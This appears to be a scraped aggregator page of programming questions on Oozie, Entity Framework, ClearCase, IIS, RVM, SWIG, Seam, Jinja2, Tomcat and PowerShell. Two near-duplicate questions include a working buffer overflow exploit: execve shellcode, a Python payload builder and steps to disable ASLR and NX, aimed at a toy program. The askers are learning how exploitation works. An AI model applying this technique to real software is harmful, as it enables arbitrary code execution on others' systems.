    The report makes it clear that investments made to date by these large organizations around the world have been uneven across the close, reporting, and filing processes, which has led to the challenges these organizations currently face in the overall process. Regardless of whether companies are using a variety of solutions or a single solution, the report shows they continue to witness increased costs, ineffectual data management, and missed reporting, which—in extreme circumstances—can impact a company's corporate image and share value. The good news is that businesses realize these problems persist, and 86 percent of companies are likely to make a significant investment during the next five years to address them.
    While they should invest, it is critical that they direct investments correctly to address the key issues this research identified:

    • Improving data integrity
    • Optimizing processes
    • Integrating the extended financial close process

    By addressing these issues, and with clear guidance on how to implement the correct business processes, infrastructure, and software solutions, finance teams will find that their reporting processes are much more effective, cost-efficient, and aligned with their performance expectations.

    To get a copy of the full report: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=11747758&src=7300117&Act=92

    To replay a webcast discussing the findings: http://www.cfo.com/webcast.cfm?webcast=14639438&pcode=ORA061912_ORA

    Read the article

  • Configuring correct port for Oozie (invoking PIG script) in Cloudera Hue

    - by user2985324
    I am new to the CDH4 Oozie workflow editor. While trying to invoke a Pig script from the Oozie workflow editor, I am getting the following error:

        HadoopAccessorException: E0900: Jobtracker [mymachine:8032] not allowed, not in Oozies whitelist

    It looks like Oozie is submitting the job to the YARN port (8032). I want it to submit to port 8021 (the MR JobTracker). Can someone help me identify where to set the JobTracker URL or port so that Oozie picks up the correct one (using Hue or Cloudera Manager)? Previously I tried the following, but none of them helped:

    1. Modified the /user/hue/oozie/workspaces/../workflow.xml file. However, it gets overwritten when I submit the job from the workflow editor.

    2. In Cloudera Manager -- Oozie -- Configuration -- Oozie Server (Advanced) -- Oozie Server Configuration Safety Valve for oozie-site.xml, I set the following properties and restarted the Oozie service:

        <property>
          <name>oozie.service.HadoopAccessorService.nameNode.whitelist</name>
          <value>mymachine:8020</value>
        </property>
        <property>
          <name>oozie.service.HadoopAccessorService.jobTracker.whitelist</name>
          <value>mymachine:8021</value>
        </property>

    3. Tried to override the 'jobTracker' property while configuring the Pig task. This appears as follows in the workflow file; however, it doesn't take effect (or doesn't override) and Oozie still uses port 8032:

        <global>
          <configuration>
            <property>
              <name>jobTracker</name>
              <value>mymachine:8021</value>
            </property>
          </configuration>
        </global>

    I am using CDH4. Thanks for looking into my question.

    Read the article

  • IQueryable<> from stored procedure (entity framework)

    - by mmcteam
    I want to get an IQueryable<> result when executing a stored procedure. Here is a piece of code that works fine:

        IQueryable<SomeEntitiy> someEntities;
        var globbalyFilteredSomeEntities =
            from se in m_Entities.SomeEntitiy
            where se.GlobalFilter == 1234
            select se;

    I can use this to apply a global filter, and later use the result like so:

        result = globbalyFilteredSomeEntities
            .OrderByDescending(se => se.CreationDate)
            .Skip(500)
            .Take(10);

    What I want to do is use some stored procedures in the global filter. I tried:

    Adding the stored procedure to m_Entities, but it returns IEnumerable<> and executes the stored procedure immediately:

        var globbalyFilteredSomeEntities = m_Entities.SomeEntitiyStoredProcedure(1234);

    Materializing the query using the EFExtensions library, but it is IEnumerable<>. If I use AsQueryable() and OrderBy(), Skip(), Take(), and after that ToList() to execute the query, I get an exception saying that the DataReader is open and I need to close it first (I can't paste the exact error; it is in Russian).

        var globbalyFilteredSomeEntities = m_Entities.CreateStoreCommand("exec SomeEntitiyStoredProcedure(1234)")
            .Materialize<SomeEntitiy>();
            //.AsQueryable()
            //.OrderByDescending(se => se.CreationDate)
            //.Skip(500)
            //.Take(10)
            //.ToList();

    Also, just skipping .AsQueryable() is not helpful; I get the same exception. When I put ToList() the query executes, but it is too expensive to execute the query without Skip(), Take().

    Read the article

  • Proper 'cleartool mkview' for ClearCase Snapshot view creation

    - by Jörg Battermann
    Good afternoon. It seems like I am somewhat stuck in CC-land these days, but I have one (hopefully) final question regarding proper CC handling: when using the CC View Creation Wizard with the two steps/details below, I can create a proper snapshot view on my machine perfectly fine; however, when trying to do the same with the mkview command, it fails. Here are the screenshots of the view creation wizard. That results in the following (working) view:

        cleartool> lsview battjo6r_view2
        battjo6r_view2  \\Eh40yd4c\Views\battjo6r_view2.vws
        cleartool> lsview -long battjo6r_view2
        Tag: battjo6r_view2
        Global path: \\Eh40yd4c\Views\battjo6r_view2.vws
        Server host: Eh40yd4c
        Region: CT_WORK
        Active: NO
        View tag uuid: f34cf43f.b4d048df.845d.ed:21:a2:9c:45:ff
        View on host: Eh40yd4c
        View server access path: D:\Views\battjo6r_view2.vws
        View uuid: f34cf43f.b4d048df.845d.ed:21:a2:9c:45:ff
        View attributes: snapshot
        View owner: WW005\battjo6r

    However, when trying to create the view manually via

        mkview -snapshot -tag battjo6r_view2 -vws \\Eh40yd4c\Views\battjo6r_view2.vws -host Eh40yd4c -hpath D:\Views\battjo6r_view2.vws -gpath \\Eh40yd4c\Views\battjo6r_view2.vws battjo6r_view2

    I get the following error:

        cleartool> mkview -snapshot -tag battjo6r_view2 -vws \\Eh40yd4c\Views\battjo6r_view2.vws -host Eh40yd4c -hpath D:\Views\battjo6r_view2.vws -gpath \\Eh40yd4c\Views\battjo6r_view2.vws battjo6r_view2
        Created view.
        Host-local path: Eh40yd4c:D:\Views\battjo6r_view2.vws
        Global path: \\Eh40yd4c\Views\battjo6r_view2.vws
        cleartool: Error: Unable to find view by uuid:6f99f7ae.6a5d40e4.ba32.37:8e:e5:a4:ed:18, last known at "<viewhost>:<stg_path>".
        cleartool: Error: Unable to establish connection to snapshot view "6f99f7ae.6a5d40e4.ba32.37:8e:e5:a4:ed:18": ClearCase object not found
        cleartool: Warning: Unable to open snapshot view "D:\SnapShotViews\battjo6r_view2".
        cleartool: Error: Unable to create snapshot view "battjo6r_view2".
        Removing the view ...

    Any idea why this is happening? Am I missing something?

    Read the article

  • MVC App Works in Visual Studio, but not IIS7

    - by kesh
    Working on an ASP.NET MVC project, and I'm having some difficulties deploying to a shared dev server. Locally, when debugging using the local Visual Studio 2008 server, everything works peachy. However, once deployed, I receive the following error:

        Parser Error
        Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
        Parser Error Message: Unable to find an entry point named 'BCryptGetFipsAlgorithmMode' in DLL 'bcrypt.dll'.
        Source Error:
        Line 1: <%@ Application Codebehind="Global.asax.cs" Inherits="APPLICATION_NAME.Web.MvcApplication" Language="C#" %>
        Source File: /APPLICATION_NAME/global.asax    Line: 1
        Version Information: Microsoft .NET Framework Version:2.0.50727.4927; ASP.NET Version:2.0.50727.4927

    In the error log:

        Event sequence: 1
        Event occurrence: 1
        Event detail code: 0
        Application information:
            Application domain: /LM/W3SVC/1/ROOT/APPLICATION_NAME-4-128995312096183595
            Trust level: Full
            Application Virtual Path: /APPLICATION_NAME
            Application Path: E:\PROJECTS\APPLICATION\APPLICATION_NAME\APPLICATION_NAME\app\APPLICATION_NAME.Web\
            Machine name: PC
        Process information:
            Process ID: 4608
            Process name: w3wp.exe
            Account name: IIS APPPOOL\DefaultAppPool
        Exception information:
            Exception type: HttpException
            Exception message: Unable to find an entry point named 'BCryptGetFipsAlgorithmMode' in DLL 'bcrypt.dll'.
        Request information:
            Request URL: http://localhost/APPLICATION_NAME
            Request path: /APPLICATION_NAME
            User host address: ::1
            User:
            Is authenticated: False
            Authentication Type:
            Thread account name: IIS APPPOOL\DefaultAppPool
        Thread information:
            Thread ID: 6
            Thread account name: IIS APPPOOL\DefaultAppPool
            Is impersonating: False
            Stack trace:
                at System.Web.Compilation.BuildManager.ReportTopLevelCompilationException()
                at System.Web.Compilation.BuildManager.EnsureTopLevelFilesCompiled()
                at System.Web.Hosting.HostingEnvironment.Initialize(ApplicationManager appManager, IApplicationHost appHost, IConfigMapPathFactory configMapPathFactory, HostingEnvironmentParameters hostingParameters)
        Custom event details:

    After finding the deployment error, I tried adding an application locally, and that seems to result in the same error. On my local dev machine, I'm using Windows 7 RTM (x64), and on the shared server I'm running Windows Server 2008 Standard (x86). I poked around, and FIPS encryption in Local Security Policy is disabled, so I'm at a bit of a loss.
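
    A minimal sketch for double-checking the effective machine-wide FIPS policy directly, assuming the standard Vista/Server 2008 registry location that Local Security Policy writes to (run on the server itself):

        import winreg

        # Assumed standard location of the FIPS policy flag on Vista/Server 2008
        # and later; Local Security Policy's "System cryptography: Use FIPS
        # compliant algorithms..." setting is stored here.
        KEY_PATH = r"SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy"

        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH) as key:
            enabled, _ = winreg.QueryValueEx(key, "Enabled")

        print("FIPS policy enabled:", bool(enabled))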

    Read the article

  • Ruby through RVM fails

    - by TheLQ
    In constant battle to install Ruby 1.9.2 on an RPM system (the OS is based off of CentOS), I'm trying again with RVM. So once I install it, I then try to use it:

        [root@quackwall ~]# rvm use 1.9.2
        Using /usr/local/rvm/gems/ruby-1.9.2-p136
        [root@quackwall ~]# ruby
        bash: ruby: command not found
        [root@quackwall ~]# which ruby
        /usr/bin/which: no ruby in (/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin)

    Now that's interesting; rvm info says something completely different:

        [root@quackwall bin]# rvm info

        ruby-1.9.2-p136:

          system:
            uname: "Linux quackwall.highwow.lan 2.6.18-194.8.1.v5 #1 SMP Thu Jul 15 01:14:04 EDT 2010 i686 i686 i386 GNU/Linux"
            bash:  "/bin/bash => GNU bash, version 3.2.25(1)-release (i686-redhat-linux-gnu)"
            zsh:   " => not installed"

          rvm:
            version: "rvm 1.2.2 by Wayne E. Seguin ([email protected]) [http://rvm.beginrescueend.com/]"

          ruby:
            interpreter:  "ruby"
            version:      "1.9.2p136"
            date:         "2010-12-25"
            platform:     "i686-linux"
            patchlevel:   "2010-12-25 revision 30365"
            full_version: "ruby 1.9.2p136 (2010-12-25 revision 30365) [i686-linux]"

          homes:
            gem:  "/usr/local/rvm/gems/ruby-1.9.2-p136"
            ruby: "/usr/local/rvm/rubies/ruby-1.9.2-p136"

          binaries:
            ruby: "/usr/local/rvm/rubies/ruby-1.9.2-p136/bin/ruby"
            irb:  "/usr/local/rvm/rubies/ruby-1.9.2-p136/bin/irb"
            gem:  "/usr/local/rvm/rubies/ruby-1.9.2-p136/bin/gem"
            rake: "/usr/local/rvm/gems/ruby-1.9.2-p136/bin/rake"

          environment:
            PATH:         "/usr/local/rvm/gems/ruby-1.9.2-p136/bin:/usr/local/rvm/gems/ruby-1.9.2-p136@global/bin:/usr/local/rvm/rubies/ruby-1.9.2-p136/bin:bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin:/usr/local/rvm/bin"
            GEM_HOME:     "/usr/local/rvm/gems/ruby-1.9.2-p136"
            GEM_PATH:     "/usr/local/rvm/gems/ruby-1.9.2-p136:/usr/local/rvm/gems/ruby-1.9.2-p136@global"
            MY_RUBY_HOME: "/usr/local/rvm/rubies/ruby-1.9.2-p136"
            IRBRC:        "/usr/local/rvm/rubies/ruby-1.9.2-p136/.irbrc"
            RUBYOPT:      ""
            gemset:       ""

    So I have RVM saying one thing and bash saying another. Any suggestions on how to get this working?

    Read the article

  • Handling references to pointers/double pointers using SWIG [C++ to Java]

    - by Siddu
    My code has an interface like:

        class IExample {
            ~IExample();
            // pure virtual methods ...
        };

    a class inheriting the interface like:

        class CExample : public IExample {
        protected:
            CExample();
            // implementation of pure virtual methods ...
        };

    and a global function to create an object of this class:

        void createExample( IExample *& obj ) { obj = new CExample(); }

    Now, I am trying to get a Java API wrapper using SWIG. The SWIG-generated interface has a constructor like

        IExample(long cPtr, boolean cMemoryOwn)

    and the global function becomes

        createExample(IExample obj)

    The problem is when I do:

        IExample exObject = new IExample(LogFileLibraryJNI.new_plong(), true /*or false*/ );
        createExample( exObject );

    the createExample(...) API at the C++ layer successfully gets called; however, when the call returns to the Java layer, the cPtr (long) variable does not get updated. Ideally, this variable should contain the address of the CExample object. I read in the documentation that typemaps can be used to handle output parameters and pointer references as well; however, I am not able to figure out a suitable way to use typemaps to resolve this problem, or any other workaround. Please suggest if I am doing something wrong, or how to use a typemap in such a situation.

    Read the article

  • ASP.NET MVC 2 with NServiceBus unable to load requested types

    - by dp
    I am trying to use NServiceBus with an ASP.NET MVC 2 website (using VS 2010 and the .NET 4.0 framework). However, when I run the site on my local machine, I get the following error:

        Unable to load one or more of the requested types. Retrieve the LoaderExceptions property for more information.

    Here are the relevant steps I have taken:

    Downloaded the NServiceBus.2.0.0.1145 binaries
    In my ASP.NET MVC app, I've added references to NServiceBus.dll and NServiceBus.Core.dll
    In Global.asax.cs I've added:

        public static IBus Bus { get; private set; }

        protected void Application_Start()
        {
            AreaRegistration.RegisterAllAreas();
            RegisterRoutes(RouteTable.Routes);

            Bus = NServiceBus.Configure
                .WithWeb()
                .Log4Net()
                .DefaultBuilder()
                .XmlSerializer()
                .MsmqTransport()
                    .IsTransactional(false)
                    .PurgeOnStartup(false)
                .UnicastBus()
                    .ImpersonateSender(false)
                .CreateBus()
                .Start();
        }

    In web.config, I've added:

        <MsmqTransportConfig InputQueue="MyWebClient" ErrorQueue="error" NumberOfWorkerThreads="1" MaxRetries="5"/>
        <UnicastBusConfig>
          <MessageEndpointMappings>
            <add Messages="Messages" Endpoint="MyServerInputQueue"/>
          </MessageEndpointMappings>
        </UnicastBusConfig>

    The error indicates that the problem is with the first line in the Global.asax.cs file. Is it possible that there is a problem with NServiceBus running under .NET 4.0?

    Read the article

  • wp_get_archives(cat=id) <-- Any way to specify cat id in archives?

    - by Matrym
    Does anyone know how to specify an INCLUDE ONLY category using wp_get_archives? I would like to specify a category but then list results by month. I've tried kwebble's plugin to no avail. I've also found the following on the WP forums, but it appears to only exclude categories. Perhaps it can be modified to include instead? Even given that, I'm not sure how I would call it... Thanks in advance!

        add_filter( 'getarchives_where', 'customarchives_where' );
        add_filter( 'getarchives_join', 'customarchives_join' );

        function customarchives_join( $x ) {
            global $wpdb;
            return $x . " INNER JOIN $wpdb->term_relationships ON ($wpdb->posts.ID = $wpdb->term_relationships.object_id) INNER JOIN $wpdb->term_taxonomy ON ($wpdb->term_relationships.term_taxonomy_id = $wpdb->term_taxonomy.term_taxonomy_id)";
        }

        function customarchives_where( $x ) {
            global $wpdb;
            $exclude = '1'; // category id to exclude
            return $x . " AND $wpdb->term_taxonomy.taxonomy = 'category' AND $wpdb->term_taxonomy.term_id NOT IN ($exclude)";
        }

    Read the article

  • Practical value for concurrent-request-timeout parameter

    - by Andrei
    In the Seam Reference Guide, one can find this paragraph: "We can set a sensible default for the concurrent request timeout (in ms) in components.xml:"

        <core:manager concurrent-request-timeout="500" />

    However, we found that 500 ms is not nearly enough time for most of the cases we had to deal with, especially with the severe restrictions Seam places on conversation access.

    In our application we have a combination of page-scoped ajax requests (triggered by various user actions), some global-scoped polling notification logic (part of the header, so included in every page) and regular links that invoke actions and/or navigate to other pages. Therefore, we get the dreaded concurrent access to conversation exception way too often, even without any significant load on the site. After researching the options for quite a bit, we ended up bumping this value to several seconds (we're debating whether to bump it up to 10s), as none of the recommended solutions seemed able to solve our issue completely (even forcing a global queue for all the ajax requests would still leave us exposed to a user deciding to click a link right when one of our polling calls was in progress). And we'd much rather have the users wait for a second or two instead of getting an error page just because they clicked a link at the wrong moment.

    And now to the question: is there something obvious we're missing (like a way to allow concurrent access to conversations and taking care of the needed locking ourselves, for instance :)? How do people solve this problem (ajax requests mixed with user-driven interaction) in Seam? Disabling all the links on the page while ajax requests are in progress (as suggested by one blog page) is really not a viable option. Any other suggestions? TIA, Andrei
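    For concreteness, the several-second setting under discussion would look like this in components.xml (the 10000 ms figure is the value being debated above, not a recommended default; conversation-timeout is shown only as the usual companion attribute):

        <core:manager concurrent-request-timeout="10000"
                      conversation-timeout="120000" />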

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0, and the NX bit in the BIOS). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds, but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See the comment in the code.)

    Vulnerable file buffer.s:

        .data
        .fmtsp:   .string "Stackpointer %p\n"
        .fmtjump: .string "Jump to %p\n"
        .text
        .global main
        main:
            push %rbp
            mov %rsp, %rbp
            sub $120, %rsp
            # calling printf without setting rax
            # to zero results in a segfault. why?
            xor %rax, %rax
            mov %rsp, %rsi
            mov $.fmtsp, %rdi
            call printf
            mov %rsp, %rdi
            call gets
            xor %rax, %rax
            mov $.fmtjump, %rdi
            mov 8(%rbp), %rsi
            call printf
            xor %rax, %rax
            leave
            ret

    shellcode.s:

        .text
        .global main
        main:
            mov $0x68732f6e69622fff, %rbx
            shr $0x8, %rbx
            push %rbx
            mov %rsp, %rdi
            xor %rsi, %rsi
            xor %rdx, %rdx
            xor %rax, %rax
            add $0x3b, %rax
            syscall

    exploit.py:

        shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
        stackpointer = "\x7f\xff\xff\xff\xe3\x28"
        output = shellcode
        output += 'a' * (120 - len(shellcode)) # fill buffer
        output += 'b' * 8 # override stored base pointer
        output += ''.join(reversed(stackpointer))
        print output

    Compiled with:

        $ gcc -o buffer buffer.s
        $ gcc -o shellcode shellcode.s

    Started with:

        $ python exploit.py | ./buffer
        Stackpointer 0x7fffffffe328
        Jump to 0x7fffffffe328

    Debugging with gdb (note: corrected stackpointer address in exploit.py for gdb):

        $ python exploit.py > exploit.txt
        $ gdb buffer
        (gdb) run < exploit.txt
        Starting program: /home/henning/bo/buffer < exploit.txt
        Stackpointer 0x7fffffffe308
        Jump to 0x7fffffffe308
        process 4185 is executing new program: /bin/dash
        Program exited normally.
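    A reproduction note, offered as a likely explanation rather than a verified fix: the gdb run above shows /bin/dash actually starting, and when an exploit is fed over a pipe the spawned shell inherits a stdin that is already at EOF, so it starts and exits immediately - which looks exactly like "terminates directly after execve". The classic trick is to keep stdin open by appending cat:

        $ (python exploit.py; cat) | ./buffer

    Anything typed after that goes to the spawned shell's stdin.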

    Read the article

  • Create Jinja2 macros that put content in separate places

    - by Brian M. Hunt
    I want to create a table of contents and endnotes in a Jinja2 template. How can one accomplish these tasks? For example, I want to have a template as follows:

        {% block toc %}
        {# ... the ToC goes here ... #}
        {% endblock %}
        {% include "some other file with content.jnj" %}
        {% block endnotes %}
        {# ... the endnotes go here ... #}
        {% endblock %}

    Where the some other file with content.jnj has content like this:

        {% section "One" %}
        Title information for Section One (may be quite long); goes in Table of Contents
        ... Content of section One
        {% section "Two" %}
        Title information of Section Two (also may be quite long)
        <a href="#" id="en1">EndNote 1</a>
        <script type="text/javascript">...(may be reasonably long)</script>
        {# ... Everything up to here is included in the EndNote #}

    Where I say "may be quite/reasonably long" I mean to say that it can't reasonably be put into quotes as an argument to a macro or global function. I'm wondering if there's a pattern for this that may accommodate this, within the framework of Jinja2. My initial thought is to create an extension, so that one can have a block for sections and endnotes, like so:

        {% section "One" %}
        Title information goes here.
        {% endsection %}

        {% endnote "one" %}
        <a href="#">...</a>
        <script> ... </script>
        {% endendnote %}

    Then have global functions (that pass in the Jinja2 Environment):

        {{ table_of_contents() }}
        {% include ... %}
        {{ endnotes() }}

    However, while this will work for endnotes, I'd presume it requires a second pass by something for the table of contents. Thank you for reading. I'd be much obliged for your thoughts and input. Brian
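    One low-tech pattern for that second pass (a sketch, under the assumption that a plain {{ section(...) }} call is acceptable instead of a custom {% section %} tag): render the content once just to harvest titles, then render the full page with the collected ToC.

        from jinja2 import Environment, DictLoader

        templates = {
            "content.jnj": '{{ section("One") }}Content of section One. '
                           '{{ section("Two") }}Content of section Two.',
            "page.jnj": "Contents: {{ toc|join(', ') }}\n{% include 'content.jnj' %}",
        }
        env = Environment(loader=DictLoader(templates))

        def recorder(store):
            def section(title):
                store.append(title)   # remember the title for the ToC
                return ""             # emit nothing at the call site
            return section

        # pass 1: render the content alone, only to collect section titles
        titles = []
        env.globals["section"] = recorder(titles)
        env.get_template("content.jnj").render()

        # pass 2: render the real page; re-register so titles aren't duplicated
        env.globals["section"] = recorder([])
        print(env.get_template("page.jnj").render(toc=titles))

    Endnotes can use the same recorder idea in a single pass, since they are emitted after the content anyway.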

    Read the article

  • refering Tomcat JNDI datasource in persistence.xml

    - by binary_runner
    In server.xml I've defined a global resource (I'm using Tomcat 6):

        <GlobalNamingResources>
          <Resource name="jdbc/myds" auth="Container" type="javax.sql.DataSource"
                    maxActive="10" maxIdle="3" maxWait="10000"
                    username="sa" password="" driverClassName="org.h2.Driver"
                    url="jdbc:h2:~/.myds/data/db" />
        </GlobalNamingResources>

    I see in catalina.out that this is bound, so I suppose it's OK. In my web app I have the link to the datasource; I'm not sure it's OK:

        <Context>
          <ResourceLink global='jdbc/myds' name='jdbc/myds' type="javax.sql.Datasource"/>
        </Context>

    and in the application there is persistence.xml:

        <persistence xmlns="http://java.sun.com/xml/ns/persistence"
                     xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                     xsi:schemaLocation="http://java.sun.com/xml/ns/persistence http://java.sun.com/xml/ns/persistence/persistence_2_0.xsd"
                     version="2.0">
          <persistence-unit name="oam" transaction-type="RESOURCE_LOCAL">
            <provider>org.hibernate.ejb.HibernatePersistence</provider>
            <non-jta-data-source>jdbc/myds</non-jta-data-source>
            <!-- class definitions here, nothing else -->
            <properties>
              <property name="hibernate.dialect" value="org.hibernate.dialect.H2Dialect"/>
            </properties>
          </persistence-unit>
        </persistence>

    It should be OK, but most probably this or the ResourceLink definition is wrong, because I'm getting:

        javax.naming.NameNotFoundException: Name jdbc is not bound in this Context

    What's wrong, and why does this not work?
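    Two details jump out, sketched here as candidate fixes rather than a verified answer: the ResourceLink type is case-sensitive (javax.sql.Datasource should read javax.sql.DataSource), and inside a webapp Tomcat publishes JNDI resources under java:comp/env/, a prefix Hibernate will not add for you:

        <!-- in the webapp's context.xml: note the capital S -->
        <ResourceLink global="jdbc/myds" name="jdbc/myds" type="javax.sql.DataSource"/>

        <!-- in persistence.xml: fully qualified JNDI name -->
        <non-jta-data-source>java:comp/env/jdbc/myds</non-jta-data-source>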

    Read the article

  • fork() within a fork()

    - by codingfreak
    Hi. Is there any way to differentiate the child processes created by different fork() calls within a program?

        global variable i;

        SIGCHLD handler function() { i--; }

        handle() {
            fork();                         /* --> FORK2 */
        }

        main() {
            while (1) {
                if (i < 5) {
                    i++;
                    if ((fpid = fork()) == 0)   /* --> FORK1 */
                        handle();
                    else if (fpid > 0)
                        .....
                }
            }
        }

    Is there any way I can differentiate between the child processes created by FORK1 and FORK2? I am trying to decrement the value of the global variable i in the SIGCHLD handler, and it should be decremented only for the processes created by FORK1. I tried to use an array and save the process ids [this code is placed in the fpid > 0 part] of the child processes created by FORK1, and then decrement i only if the pid of the dead child is within the array. But this didn't work out, as sometimes child processes die so quickly that the array isn't updated in time and everything gets messed up. So is there any better solution for this problem?
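    The race described above (a child dying before its pid lands in the array) is usually closed by blocking SIGCHLD around the fork, so the handler cannot run until the pid has been recorded. A compilable sketch - fork1_pids, fork1() and MAX_KIDS are made-up names for illustration:

        #include <signal.h>
        #include <sys/wait.h>
        #include <unistd.h>

        #define MAX_KIDS 64
        static volatile pid_t fork1_pids[MAX_KIDS];
        static volatile sig_atomic_t nkids = 0;
        static volatile sig_atomic_t i = 0;

        /* install with sigaction(SIGCHLD, ...) in main() */
        static void sigchld_handler(int sig)
        {
            (void)sig;
            int status;
            pid_t pid;
            /* one SIGCHLD can stand for several dead children, so reap in a loop */
            while ((pid = waitpid(-1, &status, WNOHANG)) > 0)
                for (int k = 0; k < nkids; k++)
                    if (fork1_pids[k] == pid) { i--; break; }  /* FORK1 children only */
        }

        pid_t fork1(void)
        {
            sigset_t mask, old;
            sigemptyset(&mask);
            sigaddset(&mask, SIGCHLD);
            sigprocmask(SIG_BLOCK, &mask, &old);   /* defer SIGCHLD delivery */
            pid_t pid = fork();
            if (pid > 0 && nkids < MAX_KIDS)
                fork1_pids[nkids++] = pid;         /* recorded before the handler can run */
            sigprocmask(SIG_SETMASK, &old, NULL);  /* any pending SIGCHLD fires now */
            return pid;
        }

    FORK2 can keep calling plain fork(); the handler ignores its children because their pids are never recorded.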

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0, and the NX bit in the BIOS). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See the comment in the code.)

    Vulnerable file buffer.s:

        .data
        .fmtsp:   .string "Stackpointer %p\n"
        .fmtjump: .string "Jump to %p\n"
        .text
        .global main
        main:
            push %rbp
            mov %rsp, %rbp
            sub $120, %rsp
            # calling printf without setting rax
            # to zero results in a segfault. why?
            xor %rax, %rax
            mov %rsp, %rsi
            mov $.fmtsp, %rdi
            call printf
            mov %rsp, %rdi
            call gets
            xor %rax, %rax
            mov $.fmtjump, %rdi
            mov 8(%rbp), %rsi
            call printf
            xor %rax, %rax
            leave
            ret

    shellcode.s:

        .text
        .global main
        main:
            mov $0x68732f6e69622fff, %rbx
            shr $0x8, %rbx
            push %rbx
            mov %rsp, %rdi
            xor %rsi, %rsi
            xor %rdx, %rdx
            xor %rax, %rax
            add $0x3b, %rax
            syscall

    exploit.py:

        shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
        stackpointer = "\x7f\xff\xff\xff\xe3\x28"
        output = shellcode
        output += 'a' * (120 - len(shellcode)) # fill buffer
        output += 'b' * 8 # override stored base pointer
        output += ''.join(reversed(stackpointer))
        print output

    Compiled with:

        $ gcc -o buffer buffer.s
        $ gcc -o shellcode shellcode.s

    Started with:

        $ python exploit.py | ./buffer
        Stackpointer 0x7fffffffe328
        Jump to 0x7fffffffe328
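    A quick way to check whether execve really fails, rather than succeeding and exiting straight away, is to trace the victim process - a sketch using strace:

        $ python exploit.py | strace -f -e trace=execve ./buffer

    If the trace shows execve("/bin/sh", ...) returning successfully, the overflow works and the shell is most likely just exiting because its stdin (the pipe) is already at EOF; (python exploit.py; cat) | ./buffer keeps stdin open in that case.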

    Read the article

  • How to use Castle Windsor with ASP.Net web forms?

    - by Xian
    I am trying to wire up dependency injection with Windsor to standard ASP.NET web forms. I think I have achieved this using an HttpModule and a custom attribute (code shown below), although the solution seems a little clunky, and I was wondering if there is a better supported solution out of the box with Windsor? Several files are shown together here:

        // index.aspx.cs
        public partial class IndexPage : System.Web.UI.Page
        {
            protected void Page_Load(object sender, EventArgs e)
            {
                Logger.Write("page loading");
            }

            [Inject]
            public ILogger Logger { get; set; }
        }

        // WindsorHttpModule.cs
        public class WindsorHttpModule : IHttpModule
        {
            private HttpApplication _application;
            private IoCProvider _iocProvider;

            public void Init(HttpApplication context)
            {
                _application = context;
                _iocProvider = context as IoCProvider;
                if (_iocProvider == null)
                {
                    throw new InvalidOperationException("Application must implement IoCProvider");
                }
                _application.PreRequestHandlerExecute += InitiateWindsor;
            }

            private void InitiateWindsor(object sender, System.EventArgs e)
            {
                Page currentPage = _application.Context.CurrentHandler as Page;
                if (currentPage != null)
                {
                    InjectPropertiesOn(currentPage);
                    currentPage.InitComplete += delegate { InjectUserControls(currentPage); };
                }
            }

            private void InjectUserControls(Control parent)
            {
                if (parent.Controls != null)
                {
                    foreach (Control control in parent.Controls)
                    {
                        if (control is UserControl)
                        {
                            InjectPropertiesOn(control);
                        }
                        InjectUserControls(control);
                    }
                }
            }

            private void InjectPropertiesOn(object currentPage)
            {
                PropertyInfo[] properties = currentPage.GetType().GetProperties();
                foreach (PropertyInfo property in properties)
                {
                    object[] attributes = property.GetCustomAttributes(typeof(InjectAttribute), false);
                    if (attributes != null && attributes.Length > 0)
                    {
                        object valueToInject = _iocProvider.Container.Resolve(property.PropertyType);
                        property.SetValue(currentPage, valueToInject, null);
                    }
                }
            }
        }

        // Global.asax.cs
        public class Global : System.Web.HttpApplication, IoCProvider
        {
            private IWindsorContainer _container;

            public override void Init()
            {
                base.Init();
                InitializeIoC();
            }

            private void InitializeIoC()
            {
                _container = new WindsorContainer();
                _container.AddComponent<ILogger, Logger>();
            }

            public IWindsorContainer Container
            {
                get { return _container; }
            }
        }

        public interface IoCProvider
        {
            IWindsorContainer Container { get; }
        }
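    As a usage note, the InjectUserControls walk means the same attribute works on user controls too - a hypothetical control for illustration:

        // HeaderControl.ascx.cs (hypothetical)
        public partial class HeaderControl : System.Web.UI.UserControl
        {
            [Inject]
            public ILogger Logger { get; set; } // set by WindsorHttpModule at InitComplete

            protected void Page_Load(object sender, EventArgs e)
            {
                Logger.Write("header loading"); // safe: injection happened before Load
            }
        }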

    Read the article

  • Output redirection still with colors in PowerShell

    - by stej
    Suppose I run msbuild like this:

        function Clean-Sln {
            param($sln)
            MSBuild.exe $sln /target:Clean
        }
        Clean-Sln c:\temp\SO.sln

    In the Posh console the output is in colors. That's pretty handy - you spot problems just by watching the colors, and unimportant messages, for example, are grey.

    Question: I'd like to add the ability to redirect the output somewhere, like this (simplified example):

        function Clean-Sln {
            param($sln)
            MSBuild.exe $sln /target:Clean | Redirect-AccordingToRedirectionVariable
        }
        $global:Redirection = 'Console'
        Clean-Sln c:\temp\SO.sln
